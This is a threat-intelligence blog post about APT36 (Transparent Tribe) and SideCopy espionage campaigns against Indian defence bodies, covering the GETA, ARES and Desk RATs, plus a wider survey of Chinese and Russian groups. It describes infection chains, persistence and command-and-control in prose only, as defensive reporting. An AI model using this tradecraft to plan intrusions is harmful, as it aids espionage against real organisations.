.webp)
Espionage Without Noise: Understanding APT36's Enduring Campaigns
Critical infrastructure all over the world is under threat from highly organized, state-sponsored "espionage ecosystems". These loosely knit but well-resourced organizations are deploying a variety of tools aimed both at disrupting essential services and gathering intelligence. Some work by launching dedicated denial of service (DDoS) attacks against transport and communications hubs as well as commercial supply chains. Others are seeking geopolitical, military or economic advantage, adept at mining for sensitive information and skilled at bypassing traditional security measures. Everything is a target and nowhere is safe.
So, what does an espionage ecosystem look like and how does it operate? In this blog, we demonstrate a recent example.
For more than a decade, the Indian government and defence organizations have operated under a constant digital shadow. Behind the scenes, a tightly connected espionage ecosystem - most notably Transparent Tribe (APT36) and the closely aligned SideCopy cluster- has continued to probe, adapt, and persist. While individual campaigns come and go, the underlying objective remains unchanged: long-term intelligence collection through stealthy, resilient access, emphasizing the importance of sustained defence efforts.
These actors are not flashy. Instead, they rely on proven tactics, spear-phishing, weaponized documents, and a mix of custom and off-the-shelf remote access trojans to quietly embed themselves in target environments. Over time, however, their tooling has steadily evolved. Cross-platform payloads, memory-resident execution, and increasingly covert command-and control channels now form the backbone of an ecosystem designed for patience rather than speed, encouraging defenders to adapt continually.
A Surge in Activity: What We Observed
Over the past month, Aryaka Threat Research Labs observed multiple active campaigns targeting Indian defence and government-aligned organizations across both Windows and Linux environments. Detailing these campaigns' focus emphasizes the persistent threat landscape faced by regional security sectors.
Windows Campaign: GETA RAT via Living-Off-the-Land Abuse
One active campaign targeted Windows systems using phishing emails that delivered LNK and HTA files. These files ultimately deployed GETA RAT, a .NET-based remote access trojan frequently linked to the SideCopy cluster. The infection chain abuses legitimate Windows components - including mshta.exe, XAML deserialization, and in-memory payload execution - to evade traditional file-based detection.
To achieve persistence, the attackers implemented layered startup mechanisms that ensured continued access even if the disruption occurred in the infection chain. The result is a lightweight but durable foothold, well-suited for extended reconnaissance and intelligence gathering.
Linux Campaign: ARES RAT and System-Level Persistence
In parallel, a separate campaign focused on Linux environments - an area where Transparent Tribe has shown growing maturity. This operation used a Go-based downloader to install ARES RAT, a Python-based remote access tool historically associated with APT36 activity.
Once deployed, ARES RAT performed automated system profiling, recursive file enumeration, and structured data exfiltration. Persistence was achieved through system user services, allowing the malware to survive reboots while blending into normal system operations. This campaign clearly signals an intent to maintain parity across platforms, rather than treating Linux as an afterthought.
An Emerging Tool: Desk RAT Enters the Stage
Beyond known malware families, Aryaka Threat Research Labs also observed campaigns delivering Desk RAT, a Go-based remote access trojan distributed via a malicious PowerPoint Add-In (PPAM). Emphasizing this emerging tool underscores the threat actors' ongoing innovation and the need for updated detection strategies.
Desk RAT stands out for its emphasis on host telemetry and real-time monitoring. It collects detailed system diagnostics and communicates with its operators using WebSocket-based command-and-control, exchanging structured heartbeat and client information messages. This design enables continuous situational awareness on compromised hosts, reinforcing APT36's long-term surveillance objectives.
The Bigger Picture
Taken together, these campaigns reinforce a familiar but evolving narrative. Transparent Tribe and SideCopy are not reinventing espionage - they are refining it. By expanding cross-platform coverage, leaning into memory-resident techniques, and experimenting with new delivery vectors, this ecosystem continues to operate below the noise floor while maintaining strategic focus.
For defenders, the takeaway is clear: these are not isolated incidents but coordinated efforts within a mature threat ecosystem. Detecting and disrupting such actors requires visibility across platforms, attention to subtle behavioural signals, and an understanding that persistence is the attacker's greatest weapon and not speed, empowering security teams to take comprehensive action.
Cyber Espionage is a Global Challenge
Cyber espionage is a global challenge, and many nation-states are encountering it. Over the past two years, many countries have been targeted by a spectrum of sophisticated nation-state espionage operations driven primarily by Chinese, Russian, and Iranian APT groups. China-linked actors such as UNC6384 / Mustang Panda and APT31 (Judgement Panda / Zirconium) have run sustained phishing campaigns against diplomatic and government institutions, delivering remote access tools like PlugX and variants of Gh0stRAT such as SugarGh0st and SpiceRAT, which enable stealthy persistence, command execution, and exfiltration of sensitive data.
At the same time, Russian state-aligned groups, including Sandworm (APT44) and subgroup variants like Seashell Blizzard, have deployed backdoor loaders and RATs, most notably DarkCrystal (DcRAT), via trojanized tools and fake activation software to maintain covert footholds in Ukrainian, EU, and UK-linked networks, facilitating remote control and credential theft. Detection of these campaigns is complicated by their use of legitimate-looking tools and obfuscation techniques. CERT-EU reporting highlights these campaigns alongside other sophisticated efforts, such as the BadPilot access operations for prolonged access and espionage. Indicators of compromise include unusual network traffic, suspicious file hashes, and anomalous user activity, which security teams should monitor closely.
These multi-vector intrusions demonstrate that modern nation-state cyber espionage in the region leverages a wide array of RAT malware families and advanced TTPs, such as spear-phishing, trojanized tools, and lateral movement techniques, to achieve persistence, evade detection, and gather strategic intelligence.